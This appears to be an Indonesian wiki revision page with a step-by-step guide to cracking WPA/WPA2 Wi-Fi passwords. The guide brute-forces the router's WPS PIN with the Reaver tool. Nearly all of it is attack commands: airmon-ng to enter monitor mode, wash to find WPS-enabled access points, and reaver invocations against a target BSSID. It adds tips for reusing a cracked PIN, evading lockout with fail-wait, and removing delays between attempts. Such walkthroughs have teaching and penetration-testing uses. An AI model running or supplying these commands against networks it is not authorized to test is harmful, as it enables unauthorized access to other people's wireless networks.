Difference between revisions of "Reaver teknik menjebol WPA"
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 14: | Line 14: | ||
Lakukan | Lakukan | ||
+ | airmon-ng check kill | ||
airmon-ng start wlan0 | airmon-ng start wlan0 | ||
− | |||
==Cek AP yang WPS-nya aktif== | ==Cek AP yang WPS-nya aktif== |
Revision as of 18:09, 12 December 2015
Sumber: http://www.wirelessdomination.com/how-to-crack-wpa2-wifi-password-using-reaver-wpa2/
WPS ada di kebanyakan router untuk proses setup yang mudah melalui pin WPS, yang di hard-coded ke Access Point wireless. Reaver mengambil keuntungan dari kerentanan di WPS. Terima kasih kepada Craig Heffner untuk merilis versi open-source dari tool ini yang bernama Reaver yang mengeksploitasi kerentanan. Dalam istilah sederhana, Reaver mencoba untuk bruteforce pin; yang akan mengungkapkan WPA atau WPA2 password setelah cukup waktu.
Kumpulkan Informasi
Lakukan
airmon-ng
Aktifkan Mode Monitor
Lakukan
airmon-ng check kill airmon-ng start wlan0
Cek AP yang WPS-nya aktif
Lakukan
wash -i mon0
Crack
Lakukan
reaver -i monitormode -c channel -b targetbssid -vv reaver -i mon0 -c 1 -b C8:3A:35:54:88:81 -vv
Tip & Trick
Sebaiknya pin WPS yang sudah di crack kita simpan, agar bisa lebih mudah meng-crack password kalau AP mengubah password-nya.
reaver -i (monitor interface) -b (BSSID) -c (channel) --pin=(8 digit pin) -vv reaver -i mon0 -b 11:22:33:44:55:66 -c 1 --pin=12345678 -vv
Jika setelah 10 WPS ada error, ada warning message. Ini berarti AP membatasi pin attempt. Kita perlu wait,
reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
Default receive timeout 5 detik. Bisa di set secara manual, minimum default 1 detik.
reaver -i mon0 -b 00:01:02:03:04:05 -t 3
Default delay antara pin attempt adalah 1 detik, nilai ini dapat di naikan / diturunkan. Nilai 0 adalah tanpa delay.
reaver -i mon0 -b 00:01:02:03:04:05 -d 0